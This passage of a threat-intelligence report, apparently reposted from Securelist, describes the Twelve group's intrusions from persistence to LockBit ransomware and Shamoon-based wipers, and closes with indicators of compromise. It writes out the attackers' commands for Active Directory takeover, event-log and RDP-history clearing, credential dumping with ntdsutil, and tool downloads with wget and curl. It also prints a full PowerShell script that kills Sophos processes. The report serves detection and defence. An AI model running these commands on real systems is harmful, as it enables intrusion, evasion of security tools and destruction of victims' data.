Once started, FaceFish saves a libs.so shared library in the system, injects it into the sshd process with the ld.so.preload method and restarts the SSH service.
Example of FaceFish output
Persistence
To gain a foothold in the domain infrastructure, the adversary used PowerShell to add domain users and groups, and to modify ACLs (Access Control Lists) for Active Directory objects. Below is a list of the PowerShell commands they ran.Add-DomainGroupMember -Identity [REDACTED] -Members ‘EXCHANGE WINDOWS PERMISSIONS’
Add-DomainGroupMember -Identity [REDACTED] -Members ‘Organization Management’
Add-DomainGroupMember -Identity [REDACTED] -Members “EXCHANGE WINDOWS PERMISSIONS”
Add-DomainObjectAcl -Rights ‘All’ -TargetIdentity “users” -PrincipalIdentity “engineers”
Add-DomainObjectAcl -Rights ‘All’ -TargetIdentity “dc1” -PrincipalIdentity “users”
Add-DomainObjectAcl -Rights ‘All’ -TargetIdentity “dc1” -PrincipalIdentity “userasdasdasds”
Set-DomainObject -Credential $Cred -Identity [REDACTED]-SET @{serviceprincipalname=’nonexistent/BLAHBLAH’}
The attackers also added domain accounts and user groups with the net.exe system utility.net user [REDACTED] engineers /domain /add
net group [REDACTED] engineers /domain /add
net group engineers [REDACTED] /domain /add
net group engineers ‘EXCHANGE WINDOWS PERMISSIONS’ /add /domain
net group ‘engineers’ ‘EXCHANGE WINDOWS PERMISSIONS’ /add /domain
net group engineers /domain
net group users /domain
net group “Domain Administrators” [REDACTED] /add /domain
Furthermore, they tried distributing and running malware through the task scheduler and modified group policies to save malicious tasks for the entire domain.
Defense Evasion
To avoid detection, the attackers disguised their malware and tasks under the names of existing products or services.C:WindowsSystem32Tasksrun
C:WindowsSystem32TasksUpdate Microsoft
C:WindowsSystem32TasksYandex
C:WindowsSystem32TasksYandexUpdate
C:WindowsSYSVOL_DFSRdomainscriptsintel.exe
They also used a range of techniques to hide the traces of their activity. In particular, they cleared event logs with the wevtutil.exe system utility in various command shell variants.powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}
C:Windowssystem32cmd.EXE” /c for /F “tokens=*” %1 in (‘wevtutil.exe el’) DO
wevtutil.exe cl “%1
In addition, the attackers used a script that cleared the RDP connection history to remove the traces of their RDP usage, recent documents and list of executed files.@echo off
reg delete “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault” /va /f
reg delete “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers” /f
reg add “HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers”
attrib -s -h %userprofile%documentsDefault.rdp
del %userprofile%documentsDefault.rdp
del /f /s /q /a %AppData%MicrosoftWindowsRecentAutomaticDestinations
reg delete “HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU” /va /f
Command and Control
In one of the group’s attacks, we discovered traces of the Cobalt Strike framework, which the attackers used to contact their C2 and distribute malicious payloads. We found the tool at the following path:users{username}picturesphotos_deloloop.exe
The adversary also used the curl and wget system utilities to deliver various tools to compromised hosts.wget https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
curl https://github[.]com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Unified Kill Chain: Through
The Through stage in terms of the Unified Cyber Kill Chain refers to adversary actions within a previously compromised target network aimed at gaining access to further systems and data that the attacker needs to achieve their goals. This stage involves a series of steps designed to propagate across the network and access critical assets.
Pivoting
The adversary used ngrok to tunnel traffic. They installed that utility immediately after connecting to the system, and set port 3389 (standard RDP port) in the configuration file. After that, all illegitimate connections to the system via RDP were made through ngrok. The attackers attached the utility to a service named “svchost” with the following command:C:ProgramDatasvchostsvchost.exe service run –config
C:ProgramDatasvchostsvchost.yml
C:ProgramDatasvchost was a directory created by the attackers. The svchost.exe file is ngrok itself, while svchost.yml serves as its configuration file. In addition to the port number, it contains an authorization token, which looks as follows: 2YXVHSiK9hhc4aKCbH4i6BLh21J_6zwxt**********. Tokens differ between samples.
The ::::%16777216 value in the Source Network Address field, in the RDP event log indicates that the attackers initiated their connections via ngrok.
Discovery
The adversary used Advanced IP Scanner, BloodHound and adPEAS to reconnoiter the LAN and domain infrastructure, and to investigate the relationships between domains. Advanced IP Scanner can quickly identify all devices on a given network. BloodHound is used to analyze and visualize users and systems the domain trusts, and to identify paths of least resistance for privilege escalation. adPEAS is used to attack Active Directory, detect configuration flaws and identify ways to escalate domain privileges. Combined, these tools allow attackers to effectively probe and exploit victims’ LANs.
In addition, the group used PowerView module cmdlets to discover domain user accounts.Get-DomainObject users
Get-ADUsers users
Get-ADUser users
Get-ADUser -Filter * -SearchBase “[REDACTED OU]”
Get-ADUser -Filter * -SearchBase “[REDACTED OU]” | findstr Name
The group used PowerShell to gain domain groups data.Get-ADGroup
Get-ADGroup “EXCHANGE WINDOWS PERMISSIONS”
Get-ADGroupMember “EXCHANGE WINDOWS PERMISSIONS”
Get-ADGroupMember “engineers”
Get-DomainGroupMember engineers
Get-DomainGroupMember skzi
Privilege Escalation
To escalate privileges, the adversary primarily used the legitimate credentials of users with administrative access privileges.
In addition, they used the PowerView module to modify the attributes of new accounts they set up to achieve their goals:Add-DomainObjectAcl -Rights ‘All’
The -Rights ‘All’ parameter grants the account full access to the specified object. This may include permission to read, write, create, delete and perform various operations on the object.
Example of permissions granted with PowerView to an account of interest to the attackers
Execution
Scripts and commands
The adversary used system interpreters and publicly available tools, as well as self-written .bat and PowerShell scripts, to perform various actions in the system.
Below are some examples of attack scripts we discovered:gpo.ps1
Sophos_kill_local.ps1
Logon.bat
CleanRDPHistory.bat
c:intelGPO.bat
\netlogonlogon.bat
c:inteltest.ps1
\netlogonu.bat
SYSVOLdomainscriptsoutlookconf2003.ps1
The list of commands run by the adversary as recorded in the PowerShell log indicates that they started active PowerShell sessions on the hosts they attacked, and also gives one an idea of the operator’s level of competence.
See below for a list of commands that the attackers executed in an attempt to import the PowerView module.impot .PowerView.ps1
import .PowerView.ps1
Import-Module .PowerView.ps1
cd C:UsersPublicDocuments
Import-Module .PowerView.ps1
Set-ExecutionPolicy bypass
Import-Module .PowerView.ps1
Sophos_kill_local.ps1
A script we detected attempts to terminate Sophos processes on the computer and writes the results to local and remote log files.$LogTime = Get-Date -Format “MM-dd-yyyy_hh-mm-ss”
$path = “C:Program Files (x86)SophosLogs”
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter “ExecutablePath LIKE ‘%Sophos%'”
foreach ($process in $processes) {
$ProcessName = $process.name
$returnval = $process.terminate()
$processid = $process.handle
if($returnval.returnvalue -eq 0) {
$LogFile1 = ‘C:Program Files (x86)SophosLogs’+$LogTime+”_Success-Terminated”+”.txt”
$LogFile11 = ‘\[redacted]NETLOGONSophosLogs’+$pcname+”_”+$LogTime+”_Success-Terminated”+”.txt”
“The process $ProcessName ($processid) has been terminated successfully.” | Out-File $LogFile1 -Append -Force
“The process $ProcessName ($processid) has been terminated successfully.” | Out-File $LogFile11 -Append -Force
} else {
$LogFile2 = ‘C:Program Files (x86)SophosLogs’+$LogTime+”_Sophos Not-Terminated”+”.txt”
$LogFile22 = ‘\[redacted]NETLOGONSophosLogs’+$pcname+”_”+$LogTime+”_Sophos Not-Terminated”+”.txt”
“The process $ProcessName ($processid) has not been terminated.” | Out-File $LogFile2 -Append -Force
“The process $ProcessName ($processid) has not been terminated.” | Out-File $LogFile22 -Append -Force
}
}
Using the Task Scheduler
To perform all the ultimate destructive actions, such as starting the ransomware and wipers, the adversary used Scheduler tasks set up by modifying group policies. This enabled the adversary to execute these on all machines in the domain at the same time.
Task name
Command line
Description
Dead1
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{9042DCD8
-***}:Actions”,”cmd.exe
/c
c:programdatatwelve.exe
-pass ***
Running the ransomware via the CLI and passing a password as an argument
Dead2
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{AB35C377
-***}:Actions”,”cmd.exe
/c \[DOMAIN]netlogonwiper.
exe”
Launching a wiper via the CLI from the netlogon network share
12lock
“reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{A131C020
-***}:Actions”,”powershell
.exe Copy-Item
\[DOMAIN]netlogonwiper
.exe -Destination
C:ProgramData
Copying the wiper file with PowerShell from the netlogon network share to the local host at C:ProgramData
12lock 1
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{0B177D41
-***}:Actions”,”cmd.exe
/c
\[DOMAIN]netlogontwelve
.exe -pass ***”);
Running the ransomware from the netlogon network share via the CLI and passing a password as an argument
Copywiper
reg:\REGISTRYMACHINESOF
TWAREMicrosoftWindows
NTCurrentVersionSchedule
TaskCacheTasks{FB72DE3D
-***}:Actions”,”POWERSHELL
.EXE Copy-Item
\[DOMAIN]netlogontwelv
e.exe -Destination
C:ProgramData`
Copying the ransomware file with PowerShell from the netlogon network share to the local host at C:ProgramData
run
powershell -ex bypass -f
\[DOMAIN]netlogonoutloo
kconf2003.ps1
Running a PowerShell script that modifies group policies
YandexUpdate
\[DOMAIN]netlogon12.exe
-pass **************
Running the ransomware from the netlogon network share and passing a password as an argument
Update Microsoft
C:ProgramDataintel.exe
Launching a wiper
Credential Access
The adversary used mimikatz to obtain user credentials. They saved the utility file under the name calculator.exe to disguise its real purpose. However, they did not bother to change the utility’s default icon. The attackers used mimikatz to set up a dump of local credentials from the memory of the lsass.exe process.
Screenshot of calculator.exe running
We found artifacts indicating that mimikatz was used on compromised hosts, both in the form of an executable file and a PowerShell script.C:Users[User]Desktopx64mimikatz.exe
C:Users[User]DesktopCrackMapExecWin_v2.2hostedInvoke-Mimikatz.ps1
C:[Redacted]x64mimidrv.sys
In addition to dumping lsass.exe with mimikatz, the adversary obtained local credentials by dumping the SYSTEM, SAM and SECURITY registry branches with the reg.exe system utility and saved these to the Downloads folder for subsequent archiving and exfiltration.C:Users[USER]DownloadsSYSTEM
C:Users[USER]DownloadsSAM
C:Users[USER]DownloadsSECURITY
The attackers also tried to gain access to domain credentials. To do this, they used the ntdsutil.exe system utility to dump ntds.dit.
The command that dumps ntds.dit is shown below:$system32ntdsutil.exe”,””$system32ntdsutil.exe” “ac i ntds” ifm “create full
c:temp” q q
To extract additional credentials from the system, the attackers then used the console version of XenArmor’s All-In-One Password Recovery Pro utility, which can extract most of a user’s credentials from registry hives.
The command to collect data with All-In-One Password Recovery Pro is shown below:c:programdataupdatexenallpasswordpro.exe” -a
“c:programdataupdatereport.html”
In the screenshot below, you can see an example of running this utility with the parameters that the attackers used, and a list of data that it collects when configured like that.
Lateral Movement
To move within the victim’s infrastructure, the adversary used local and domain credentials obtained in earlier phases of the attack.
In most cases, they connected to new devices on the victim’s network via the Remote Desktop Protocol (RDP) by using the mstsc.exe executable file. They would occasionally use PsExec to move across the network via SMB and use the Enter-PSSession command to start an interactive session with remote computers on the network, a PowerShell feature for managing and running commands on remote systems with the help of PowerShell Remoting.Enter-PSSession -ComputerName [COMPUTER 1]
Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]
Enter-PSSession sets up a temporary interactive session between the local and remote systems, allowing the adversary to run PowerShell commands directly on remote machines as if running them locally. The communication process typically uses the WS-Management protocol running on top of HTTP or HTTPS.
Unified Kill Chain: Out
The Exit stage in terms of the Unified Kill Chain describes the adversary’s concluding actions after successfully infiltrating the target network and gaining access to all systems and data they are looking to access. This stage focuses on achieving the ultimate goals of the attack, which may include data theft, sabotage or other actions that compromise the confidentiality, integrity and availability (CIA) of the victim’s information assets.
Collection
The adversary collected substantial amounts of sensitive information about their victims: financial documents, technical drawings, corporate email, and so on. They used 7z to archive data they collected and forwarded the data via cloud sharing services.
Also during their attacks, the adversary archived and exfiltrated the Telegram data folder (tdata).C:Users[User]AppDataRoamingTelegram Desktoptdatatdata.7z
This folder contains cached media files (images, videos, audio), messages, stickers and documents the user has sent or received via Telegram. The data can be used for quick access without having to download files again from the servers. The tdata folder also contains session files that allow the application to automatically connect to the account without the user having to reenter their login and password.
An adversary who gains access to the folder can extract private messages, media files and documents, which results in the leakage of sensitive personal or commercial information. The adversary can leverage session files and encryption keys to bypass authentication when signing in to a Telegram account, to read chats and to impersonate the victim when sending messages.
Exfiltration
The adversary uploaded archives containing data they were interested in to https://dropmefiles.net/ via a browser. We learned that DropMeFiles was the file sharing service they used when we found a page header that read, “Завантаження вдалося! – dropmefiles.net” (“Upload successful!” – dropmefiles.net) in the browser cache in the aftermath of an attack.
Impact
Ransomware
The attackers used a version of the popular LockBit 3.0 ransomware, compiled from publicly available source code, to encrypt the data.
Kaspersky Threat Attribution Engine attribution
We detected ransomware files at the following paths:
ProgramData;
\netlogon.
The following file names featured in known incidents involving LockBit 3.0 ransomware.
twelve.exe;
1.exe;
12.exe;
enc.exe;
betta.exe;
sed.exe;
svo.exe.
Below is a detonation graph for the ransomware, built by Kaspersky Cloud Sandbox. It displays file execution and suspicious events that occur in the process. As you can see from the graph, the ransomware is quite noisy and generates a lot of events that give away its activity.
Detonation graph for the ransomware used by Twelve
As previously mentioned under Execution, the ransomware leverages group policies to spread across its victims’ infrastructures. The attackers used PowerShell to move the ransomware file to the netlogon network share and then ran a script to modify group policies.powershell.exe -ex bypass -f C:UsersPublicgpo.ps1
After updating the policies, they set up scheduled tasks on all domain computers to copy and run the ransomware.
First, the ransomware was moved from the netlogon network share to the local ProgramData directory by the Copywiper task as follows:powershell.exe Copy-Item `\[DOMAIN]netlogontwelve.exe` -Destination `C:ProgramData`
After this, they started the ransomware from a local folder or network share via the CLI, specifying a unique password as the -pass argument:cmd.exe` /c c:programdatatwelve.exe -pass ************
Adversary action pattern
The ransomware algorithm depends on the built-in configuration file. The table below shows the configuration of the Trojan in question, identical across all samples we found.
Parameter
Meaning
Description
encrypt_mode
auto
Set encryption mode for large files. This takes one of two values: “auto” or “fast”.
encrypt_filename
TRUE
Encrypt file name
impersonation
FALSE
Use accounts listed in configuration file to escalate privileges
skip_hidden_folders
FALSE
Skip hidden directories
language_check
FALSE
Check system locale
local_disks
TRUE
Encrypt local drives
network_shares
TRUE
Encrypt network directories
kill_processes
TRUE
Terminate processes
kill_services
TRUE
Stop services
running_one
TRUE
Verify that only one ransomware process is running
print_note
FALSE
Print out ransom demand
set_wallpaper
FALSE
Change desktop wallpaper
set_icons
FALSE
Change icons of encrypted files
send_report
FALSE
Send system information to C2
self_destruct
TRUE
Remove itself when done
kill_defender
TRUE
Stop Windows Defender
wipe_freespace
FALSE
Fill all available disk space with temporary file containing random data
psexec_netspread
FALSE
Spread across network via PsExec service
gpo_netspread
FALSE
Spread across network via group policies
gpo_ps_update
TRUE
Use PowerShell to update group policies across all domains
shutdown_system
FALSE
Restart system
delete_eventlogs
TRUE
Clear system logs
delete_gpo_delay
0
Deferred removal of group policy. The value in this parameter describes the time to delay deletion by.
The configuration file also contains a list of directories where encryption should be skipped.
$recycle.bin
boot
Tor browser
config.msi
program files
windows.old
$windows.~bt
program files (x86)
intel
$windows.~ws
programdata
msocache
windows
system volume information
perflogs
x64dbg
public
all users
default
Microsoft
It also contains a list of specific files that should not be encrypted.
autorun.in
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
d3d9caps.dat
GDIPFONTCACHEV1.DAT
Finally, the ransomware does not encrypt files with the following name extensions:
386
adv
ani
bat
bin
cab
cmd
com
cpl
cur
deskthemepack
diagcab
diagcfg
diagpkg
dll
drv
exe
hlp
icl
icns
ico
ics
idx
lnk
mod
mpa
msc
msp
msstyles
msu
nls
nomedia
ocx
prf
ps1
rom
rtp
scr
shs
spl
sys
theme
themepack
wpx
lock
key
hta
msi
pdb
search-ms
Before starting work, the ransomware terminates processes that may interfere with the encryption of individual files. The names of processes to be terminated are listed below.
sql
oracle
ocssd
dbsnmp
synctime
agntsvc
isqlplussvc
xfssvccon
mydesktopservice
ocautoupds
encsvc
firefox
tbirdconfig
mydesktopqos
ocomm
dbeng50
sqbcoreservice
excel
infopath
msaccess
mspub
onenote
outlook
powerpnt
steam
thebat
thunderbird
visio
winword
wordpad
notepad
calc
wuauclt
onedrive
The ransomware also terminates the following services:
vss
sql
svc$
memtas
mepocs
msexchange
veeam
backup
GxVss
GxBlr
GxFWD
GxCVD
kavfs
AVP
avpsus
Interestingly, the configuration for creating a ransom note lacks any contacts or ways of reaching out to the attackers. The final note consists of just the group logo.
We also found that in some cases, attackers used a Trojan made from a leaked builder for the Chaos ransomware to encrypt files. We discovered samples of that ransomware at the following paths:
c:netlogonenc.exe
c:UsersUserenc.exe
c:WindowsSystem32configsystemprofileappdataroamingtwelve.exe
c:Windowssysvoldomainscriptsenc.exe
As you can see from the screenshot below, the Kaspersky Threat Attribution Engine detects that one of these samples bears 60% similarity to Chaos.
Result of the Kaspersky Threat Attribution Engine file attribution
At the time we discovered the samples, it was unclear who was behind the incidents in which they were used. However, static analysis showed that the code contained characteristic lines linking the samples to the Twelve group.
Result of the static analysis of Chaos-based ransomware
Wipers
In addition to the ransomware, the adversary used wipers to destroy their victims’ infrastructures. They typically ran the wipers after encrypting files.
The wiper file we found had been compiled from publicly available source code. The wiper rewrites the master boot record (MBR) on connected drives so when the victim next turns on the device, the “From Iran with love – Shamoon” message appears on the screen, and the operating system will not load.
String written to the MBR
The file then recursively goes through each directory, except for Windows and System Volume Information, on all mounted drives, and does the following for each file:
Overwrite the file contents with randomly generated bytes;
Overwrite file metadata: reset size and set random created/modified/opened dates;
Assign a random name to the file and delete it.
When done, the malicious file deletes itself and shuts down the system.
As we conducted our dynamic and static analyses, we concluded that the wiper version was identical to the publicly available one.
Wiper detonation graph in Kaspersky Cloud SandBox
Result of the wiper static analysis
Also while researching the attacks by Twelve, we discovered another version of the wiper. The sample was identical to Shamoon, except for a number of specifically renamed functions.
Renamed Shamoon-based wiper features
While investigating attacks by the group, we found wiper files at the following paths:
Desktop;
ProgramData;
\netlogon.
The following file names have featured in known incidents involving the wiper:
intel.exe;
mail.exe;
wiper.exe.
The wiper’s spread pattern across a victim’s infrastructure is almost no different from that of the ransomware. The adversary uses PowerShell to copy the wiper file to the netlogon network share and then runs a script that modifies group policies and creates scheduled tasks.powershell -ex bypass -f \[DOMAIN]netlogonoutlookconf2003.ps1
The wiper file is then copied from the netlogon network share to the local ProgramData folder on all previously encrypted domain computers.powershell.exe` Copy-Item `\[DOMAIN]netlogonintel.exe` -Destination `C:ProgramData
After this, a scheduled task starts and runs the wiper file, which destroys data on the device.C:ProgramDataintel.exe
Wiper spread pattern in the victim’s infrastructure
Objectives
The threat actor’s strategic goals:
Destroy critical infrastructure and disrupt business;
Steal sensitive data;
Discredit victims by reporting the compromise on the attackers’ Telegram channel.
Takeaways
Twelve is mainly driven by hacktivism rather than financial gain. This shows in their modus operandi: rather than demand a ransom for decrypting data, Twelve prefers to encrypt victims’ data and then destroy their infrastructure with a wiper to prevent recovery. The approach is indicative of a desire to cause maximum damage to target organizations without deriving direct financial benefit.
Our analysis also shows that the group sticks to a publicly available and familiar arsenal of malware tools, which suggests it makes none of its own. This makes it possible to detect and prevent Twelve’s attacks in due time. Failure to do so could result in the organization’s infrastructure sustaining significant damage from the threat actor.
Indicators of compromise
Web-Shells
05d80c987737e509ba8e6c086df95f7d
48b2e5c49f121d257b35ba599a6cd350
5dcd02bda663342b5ddea2187190c425
97aac7a2f0d2f4bdfcb0e8827a111524
dad076c784d9fcbc506c1e614aa27f1c
ecb14e506727ee67220e87ced2e6781a
f8da1f02aa64e844770e447709cdf679
Mimikatz
e930b05efe23891d19bc354a4209be3e
Scripts
7a7c0a521b7596318c7cd86582937d98
72830102884c5ebccf2afbd8d9a9ed5d
31014add3cb96eee557964784bcf8fde
7dfa50490afe4553fa6889bdafda7da2
Ngrok
43b3520d69dea9b0a27cce43c1608cad
Cobalt Strike
7bec3c59d412f6f394a290f95975e21f
Ransomware
9c74401a28bd71a87cdf5c17ad1dffa5 twelve.exe
d813f5d37ab2feed9d6a2b7d4d5b0461 12.exe
646a228c774409c285c256a8faa49bde enc.exe
5c46f361090620bfdcac6afce1150fae twelve.exe
9bd78bcf75b9011f9d7a9a6e5aee5bf6 twelve.exe
f90e95b9fcab4c1b08ca06bc2c2d6e40 12.exe
39b91f5dfbbec13a3ec7cce670cf69ad sed.exe/1.exe/Screen2.exe/SVO.exe/BETTA.EXE
Wiper
4bff90a6f7bafc8e719e8cab87ab1766 intel.exe/mail.exe
File paths
C:ProgramDatased.exe
C:Users{username}Downloadssed.exe
C:Users{username}Desktopsed.exe
C:programdatasvchostsvchost.exe
C:programdatasvchostsvchost.yml
C:Users{username}AppDataLocalCEFUser DataDictionariessvchost.exe
C:Users{username}AppDataLocalCEFUser DataDictionariessvchost.yml
C:Users{username}Desktopsvchost.exe
C:Users{username}Desktopsvchost.yml
C:users{username}picturesphotos_deloloop.exe
C:users{username}downloadschisel_1.9.1_windows_amd64chisel.exe
C:Users{username}DocumentsPowerView.ps1
C:Users{username}Documentscalculator.exe
C:WindowsqbkLIdag.exe
C:WindowsSystem32Tasksrun
C:WindowsSystem32TasksUpdate Microsoft
C:WindowsSystem32TasksYandex
C:WindowsSystem32TasksYandexUpdate
C:WindowsSYSVOLdomainscriptsintel.exe
C:WindowsSYSVOLdomainscriptsoutlookconf2003.ps1
C:WindowsSYSVOLdomainscriptsZZZZZZ
C:WindowsSYSVOL_DFSRdomainscriptsintel.exe
\[DOMAIN]netlogon12.exe
\[DOMAIN]netlogonoutlookconf2003.ps1
\[DOMAIN]netlogonintel.exe
C:12312.exe
C:ProgramDataintel.exe
C:UsersPublic46a2209036e6282c45f8dfd3f046033d.ps1
C:UsersPublicgpo.ps1
C:WindowsLogsPsExec.exe
Domains and IPs
212.109[.]217.88
195.2[.]79.195
109.205[.]56.229
193.110[.]79.47
195.2[.]79.195
217.148[.]143.196
5.8[.]16.147
5.8[.]16.148
5.8[.]16.149
5.8[.]16.169
5.8[.]16.170
5.8[.]16.236
5.8[.]16.238
79.137[.]69.34
85.204[.]124.94
89.238[.]132.68
89.33[.]8.198
91.90[.]121.220
Article Link: Twelve: from initial compromise to ransomware and wipers | Securelist
1 post – 1 participant
Read full topic